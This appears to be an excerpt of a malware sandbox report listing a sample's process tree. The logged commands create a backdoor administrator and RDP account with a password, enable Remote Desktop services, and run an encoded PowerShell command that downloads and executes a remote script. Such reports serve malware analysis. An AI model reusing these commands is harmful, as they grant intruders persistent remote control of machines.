    cmdline: "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f

[3] C:\Windows\system32\net.exe
    cmdline: "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
    - Suspicious use of WriteProcessMemory

[4] C:\Windows\system32\net1.exe
    cmdline: C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add

[3] C:\Windows\system32\cmd.exe
    cmdline: "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
    - Suspicious use of WriteProcessMemory

[4] C:\Windows\system32\cmd.exe
    cmdline: cmd /c net start rdpdr
    - Suspicious use of WriteProcessMemory

[5] C:\Windows\system32\net.exe
    cmdline: net start rdpdr
    - Suspicious use of WriteProcessMemory

[6] C:\Windows\system32\net1.exe
    cmdline: C:\Windows\system32\net1 start rdpdr

[3] C:\Windows\system32\cmd.exe
    cmdline: "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
    - Suspicious use of WriteProcessMemory

[4] C:\Windows\system32\cmd.exe
    cmdline: cmd /c net start TermService
    - Suspicious use of WriteProcessMemory

[5] C:\Windows\system32\net.exe
    cmdline: net start TermService

[6] C:\Windows\system32\net1.exe
    cmdline: C:\Windows\system32\net1 start TermService

[1] C:\Windows\System32\cmd.exe
    cmdline: cmd /C net.exe user WgaUtilAcc 000000 /del

[2] C:\Windows\system32\net.exe
    cmdline: net.exe user WgaUtilAcc 000000 /del

[3] C:\Windows\system32\net1.exe
    cmdline: C:\Windows\system32\net1 user WgaUtilAcc 000000 /del

[1] C:\Windows\System32\cmd.exe
    cmdline: cmd /C net.exe user WgaUtilAcc h6iJyd4x /add

[2] C:\Windows\system32\net.exe
    cmdline: net.exe user WgaUtilAcc h6iJyd4x /add

[3] C:\Windows\system32\net1.exe
    cmdline: C:\Windows\system32\net1 user WgaUtilAcc h6iJyd4x /add

[1] C:\Windows\System32\cmd.exe
    cmdline: cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD

[2] C:\Windows\system32\net.exe
    cmdline: net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD

[3] C:\Windows\system32\net1.exe
    cmdline: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD

[1] C:\Windows\System32\cmd.exe
    cmdline: cmd /C net.exe LOCALGROUP "Remote Desktop Users" MHKKHUYI$ /ADD

[2] C:\Windows\system32\net.exe
    cmdline: net.exe LOCALGROUP "Remote Desktop Users" MHKKHUYI$ /ADD

[3] C:\Windows\system32\net1.exe
    cmdline: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" MHKKHUYI$ /ADD

[1] C:\Windows\System32\cmd.exe
    cmdline: cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD

[2] C:\Windows\system32\net.exe
    cmdline: net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD

[3] C:\Windows\system32\net1.exe
    cmdline: C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD

[1] C:\Windows\System32\cmd.exe
    cmdline: cmd /C net.exe user WgaUtilAcc h6iJyd4x

[2] C:\Windows\system32\net.exe
    cmdline: net.exe user WgaUtilAcc h6iJyd4x

[3] C:\Windows\system32\net1.exe
    cmdline: C:\Windows\system32\net1 user WgaUtilAcc h6iJyd4x

[1] C:\Windows\System32\cmd.exe
    cmdline: cmd.exe /C wmic path win32_VideoController get name

[2] C:\Windows\System32\Wbem\WMIC.exe
    cmdline: wmic path win32_VideoController get name

[1] C:\Windows\System32\cmd.exe
    cmdline: cmd.exe /C wmic CPU get NAME

[2] C:\Windows\System32\Wbem\WMIC.exe
    cmdline: wmic CPU get NAME
    - Modifies data under HKEY_USERS

[1] C:\Windows\System32\cmd.exe
    cmdline: cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

[2] C:\Windows\system32\cmd.exe
    cmdline: cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

[3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    cmdline: powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    - Blocklisted process makes network request
    - Drops file in Program Files directory
    - Drops file in Windows directory
    - Modifies data under HKEY_USERS
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads